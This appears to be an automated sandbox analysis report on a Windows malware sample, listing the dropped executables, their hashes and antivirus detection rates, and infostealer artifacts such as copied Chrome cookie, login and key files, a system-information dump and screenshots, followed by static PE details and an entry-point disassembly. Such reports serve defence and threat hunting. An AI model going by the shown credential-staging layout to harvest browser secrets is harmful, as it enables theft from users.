                                                                                                                                                                                SHA-512:4D9753369E6D500542B87DA950021CF41553BA99CE6357E00DDDCBC8ED7179ABB29D8A4902EC0936863BEA9C79B09173FE699014025F9DDA54D56228185C62CC
                                                                                                                                                                                Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\BIMO8YMO
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):397824
                                                                                                                                                                                Entropy (8bit):3.7269481746723154
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:aE8ijGrr1Lj3crjEn2dLkbi2dX4Q4qQO8:UiT3
                                                                                                                                                                                MD5:5115E5DAB211559A85CD0154E8100F53
                                                                                                                                                                                SHA1:347800B72AC53EC6E2C87E433763B20282A2C06D
                                                                                                                                                                                SHA-256:EF156FB3A203FE197D89D63E2EA7805A1B9AF505DFFF5A58532DBFE34E7AABAA
                                                                                                                                                                                SHA-512:D03E58376BE1E299A6DA57A28ED5DB176999BADED713AA54DDB59CF8C82B97E8C0B028CE07BDDB6989C7C77E518E151E112DDE2F1D5244AC2572E4371FA68C12
                                                                                                                                                                                Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 37%
• Antivirus: ReversingLabs, Detection: 79%
Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2740224
                                                                                                                                                                                Entropy (8bit):7.959483373293049
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:MChUuz9ubrD0rNoVNsLdq0MTq24FdizzlzKGg6W6SYjUN+dCo:vUuxGD0iVNsL9cqtdi8GE6hA+3
                                                                                                                                                                                MD5:CA16CA4AA9CF9777274447C9F4BA222E
                                                                                                                                                                                SHA1:1025ED93E5F44D51B96F1A788764CC4487EE477E
                                                                                                                                                                                SHA-256:0016755526279C5C404B670ECB2D81AF46066D879C389924A6574AB9864B5C04
                                                                                                                                                                                SHA-512:72D8D2A729B8CE2940235D3A317EE3EB0EB8D1411E847D6D11E36484F520BB88B3CABD03716B3C2988B0A053426BE14AACE154F13D306883788F952CD03CF712
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 43%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\D466.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):163328
                                                                                                                                                                                Entropy (8bit):6.266388012405613
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:qkqeuZi3xqvmqEzkC34ygPsAXtITmUYasQ2:VXuk3EvmqEgS4jlLay
                                                                                                                                                                                MD5:DF13FAC0D8B182E4D8B9A02BA87A9571
                                                                                                                                                                                SHA1:B2187DEBC6FDE96E08D5014CE4F1AF5CF568BCE5
                                                                                                                                                                                SHA-256:AF64F5B2B6C4CC63B0CA4BB48F369EBA1629886D85E289A469A5C9612C4A5EE3
                                                                                                                                                                                SHA-512:BC842A80509BDA8AFFF6E12F5B5C64CCF7F1D7360F99F63CEBBC1F21936A15487EC16BDE3C2ACFF22C49EBCEDF5C426621D6F69503F4968AACC8E75611E3A816
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):1143000
                                                                                                                                                                                Entropy (8bit):7.2472305489572335
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:N6e6+O/RK8MmtDX5f11XNbW/kjvULGaPBUcXTE/RFia0/1AtBVEOi2vU86N1A:kHc8L59HbViGaJUck1iAtBVEN2vX6zA
                                                                                                                                                                                MD5:97617914D6E8A6E3CBEE8A5E5FF39AA5
                                                                                                                                                                                SHA1:CAF7FEF0EFD3DBCF176C7CFC85CC545DD0DC9EFD
                                                                                                                                                                                SHA-256:7C1C287F9CE0D8D90C95851781FF2732780177F6C1AFFECC9EED376436981112
                                                                                                                                                                                SHA-512:F4C79F9E41124044AA1D0A44E86D0A184BEDA33163D7B0973DC23B4FF5087C708175BD89F73FFC2C160A66BF23F09835C422B654353DC67CB59EA053CF60EABB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\LXBAIMOP
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                Entropy (8bit):0.6970840431455908
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\PZMY5PHV
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):73728
                                                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_cookies.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                Entropy (8bit):0.6970840431455908
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_key.bin
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):32
                                                                                                                                                                                Entropy (8bit):5.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:jYUbMR8o9eZwo:kUbMqo9Gwo
                                                                                                                                                                                MD5:FC370DE3AE9A03C5666D84F3350DDC91
                                                                                                                                                                                SHA1:62E22644A9485F6B70EAEEFFDA8B8C3B2C4D03F1
                                                                                                                                                                                SHA-256:17D41F57A87688AF3A7C0216D4E6A2D13F09C1CA78290B959DFDD7970B1797A4
                                                                                                                                                                                SHA-512:31FCE8B4462DAE87DE334EF9D7E27A47C50BAD44652146A75F0A82DE5E3CD9BC6CCF23EE43A54BAA97A90E9F47198A7C3DB21F9C2110F854D41434A9D11EBEC3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_logins.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_webdata.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):73728
                                                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                 Preview: SQLite format 3
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Information.txt
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4210
                                                                                                                                                                                Entropy (8bit):3.522601689980959
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:soteBvwHOSH8vsc/HcDPV2GJVfMGJGmcHOhsgDxGBSS4MQcU3p:qNi8UOpGQGXJp
                                                                                                                                                                                MD5:6B020A8C0E613CD6E059785E0552B4C1
                                                                                                                                                                                SHA1:AEA2B9969810AD8E70A054B24E6F719F2FA21FC6
                                                                                                                                                                                SHA-256:8C48DBA425FC0A4921F44F0928705F08954BFE01300A52CD0325B3384919C7D4
                                                                                                                                                                                SHA-512:A0378FBE2DC91DDB1DC317F8DEF77A786F8C1E8501AFEDF03AD4435888BE18B213D711D56761750BB9D62F3941059742C1839C96A882AB55C4D2B5C50CED2FAF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                 Preview: Start Build: C:\Users\hardz\AppData\Local\Temp\D375.exe
                                                                                                                                                                                 OS: Windows 10 Pro 64-bit_(x64) Build: 17134 Release: 1803
                                                                                                                                                                                 OS Language: en-US
                                                                                                                                                                                 Keyboard Languages: English (United States) |
                                                                                                                                                                                 Local Date and Time: 2021-12-01 10:05:25
                                                                                                                                                                                 UTC: -0800
                                                                                                                                                                                 UserName (ComputerName): hardz (216554)
                                                                                                                                                                                 CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Cores: 4)
                                                                                                                                                                                 Total RAM: 8191 MB
                                                                                                                                                                                 GPU: AMD
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Screen_Desktop.jpeg
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):61995
                                                                                                                                                                                Entropy (8bit):7.751969065949765
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:IcpJ1w/lxFk+PBBUpMKtwtDxwjpmAO+uz5S:Xnw/lgaBUbwtNwTOZzE
                                                                                                                                                                                MD5:CB57DABF20AA73C74D4F9264D3711C14
                                                                                                                                                                                SHA1:0C98B0A062B0D34DDE8D55A82E705E0AC4F702D2
                                                                                                                                                                                SHA-256:F55B9934FDFF0546A214ECDC90F85210FFB945E43119D84C87B2FB4D829582A3
                                                                                                                                                                                SHA-512:F3DC6A83CA9EC0D41F35BE5579905270A6DB634724E499D5BC56E762DABF81997999404A7C6F8339CC26642930DE76ACEB59633D12C499F9FCAC2E6304921838
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_cookies.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                Entropy (8bit):0.6970840431455908
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                 Preview: SQLite format 3
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_key.bin
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):32
                                                                                                                                                                                Entropy (8bit):5.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:jYUbMR8o9eZwo:kUbMqo9Gwo
                                                                                                                                                                                MD5:FC370DE3AE9A03C5666D84F3350DDC91
                                                                                                                                                                                SHA1:62E22644A9485F6B70EAEEFFDA8B8C3B2C4D03F1
                                                                                                                                                                                SHA-256:17D41F57A87688AF3A7C0216D4E6A2D13F09C1CA78290B959DFDD7970B1797A4
                                                                                                                                                                                SHA-512:31FCE8B4462DAE87DE334EF9D7E27A47C50BAD44652146A75F0A82DE5E3CD9BC6CCF23EE43A54BAA97A90E9F47198A7C3DB21F9C2110F854D41434A9D11EBEC3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..}.(n.=..1..$t?!...;..kJGBD2.I
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_logins.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                 Preview: SQLite format 3
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_webdata.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):73728
                                                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                 Preview: SQLite format 3
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\screenshot.jpg
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):61995
                                                                                                                                                                                Entropy (8bit):7.751969065949765
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:IcpJ1w/lxFk+PBBUpMKtwtDxwjpmAO+uz5S:Xnw/lgaBUbwtNwTOZzE
                                                                                                                                                                                MD5:CB57DABF20AA73C74D4F9264D3711C14
                                                                                                                                                                                SHA1:0C98B0A062B0D34DDE8D55A82E705E0AC4F702D2
                                                                                                                                                                                SHA-256:F55B9934FDFF0546A214ECDC90F85210FFB945E43119D84C87B2FB4D829582A3
                                                                                                                                                                                SHA-512:F3DC6A83CA9EC0D41F35BE5579905270A6DB634724E499D5BC56E762DABF81997999404A7C6F8339CC26642930DE76ACEB59633D12C499F9FCAC2E6304921838
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Roaming\ddigjgj
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):162304
                                                                                                                                                                                Entropy (8bit):6.257421049731965
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:U8SeVh8bW4CwA7OoEfLNFdnqP/uFkAXGHrIsHcW7qXUHf9bQ2:fvDiWpwA7OoWr2uFlGcs8RUHf9P
                                                                                                                                                                                MD5:C6E5298F945F91851744F96EE16412E5
                                                                                                                                                                                SHA1:960D38C010136A907DE89E32835608D92A200829
                                                                                                                                                                                SHA-256:F7B5A27355EAFA5302A38A1E0ADADCB619B6D42E7C1707A784297634A180A66F
                                                                                                                                                                                SHA-512:72C64EE58642A15259676259FD76582270BDC6E340A207977A8A22999E7E16FD752109E58AE8A6FB306A624221D5025C66583587CB8A074715EBF39E01B10828
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Roaming\ddigjgj:Zone.Identifier
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: [ZoneTransfer]....ZoneId=0

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Entropy (8bit):6.257421049731965
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • VXD Driver (31/22) 0.00%
                                                                                                                                                                                File name:QMn13jz6nj.exe
                                                                                                                                                                                File size:162304
                                                                                                                                                                                MD5:c6e5298f945f91851744f96ee16412e5
                                                                                                                                                                                SHA1:960d38c010136a907de89e32835608d92a200829
                                                                                                                                                                                SHA256:f7b5a27355eafa5302a38a1e0adadcb619b6d42e7c1707a784297634a180a66f
                                                                                                                                                                                SHA512:72c64ee58642a15259676259fd76582270bdc6e340a207977a8a22999e7e16fd752109e58ae8a6fb306a624221d5025c66583587cb8a074715ebf39e01b10828
                                                                                                                                                                                SSDEEP:3072:U8SeVh8bW4CwA7OoEfLNFdnqP/uFkAXGHrIsHcW7qXUHf9bQ2:fvDiWpwA7OoWr2uFlGcs8RUHf9P

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:acfc36b6b694c6e2

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x402a12
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                Time Stamp:0x5F7C6990 [Tue Oct 6 12:56:48 2020 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                Import Hash:9d24ccac58ecf11e70c100743c701d44

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                call 00007FD33CD50E17h
                                                                                                                                                                                jmp 00007FD33CD4DE7Eh
                                                                                                                                                                                mov eax, 0041F010h
                                                                                                                                                                                ret
                                                                                                                                                                                mov eax, dword ptr [02B56540h]
                                                                                                                                                                                push esi
                                                                                                                                                                                push 00000014h
                                                                                                                                                                                pop esi
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4DFF9h
                                                                                                                                                                                mov eax, 00000200h
                                                                                                                                                                                jmp 00007FD33CD4DFF8h
                                                                                                                                                                                cmp eax, esi
                                                                                                                                                                                jnl 00007FD33CD4DFF9h
                                                                                                                                                                                mov eax, esi
                                                                                                                                                                                mov dword ptr [02B56540h], eax
                                                                                                                                                                                push 00000004h
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FD33CD50EC5h
                                                                                                                                                                                pop ecx
                                                                                                                                                                                pop ecx
                                                                                                                                                                                mov dword ptr [02B55520h], eax
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4E010h
                                                                                                                                                                                push 00000004h
                                                                                                                                                                                push esi
                                                                                                                                                                                mov dword ptr [02B56540h], esi
                                                                                                                                                                                call 00007FD33CD50EACh
                                                                                                                                                                                pop ecx
                                                                                                                                                                                pop ecx
                                                                                                                                                                                mov dword ptr [02B55520h], eax
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4DFF7h
                                                                                                                                                                                push 0000001Ah
                                                                                                                                                                                pop eax
                                                                                                                                                                                pop esi
                                                                                                                                                                                ret
                                                                                                                                                                                xor edx, edx
                                                                                                                                                                                mov ecx, 0041F010h
                                                                                                                                                                                jmp 00007FD33CD4DFF7h
                                                                                                                                                                                mov eax, dword ptr [02B55520h]
                                                                                                                                                                                mov dword ptr [edx+eax], ecx
                                                                                                                                                                                add ecx, 20h
                                                                                                                                                                                add edx, 04h
                                                                                                                                                                                cmp ecx, 0041F290h
                                                                                                                                                                                jl 00007FD33CD4DFDCh
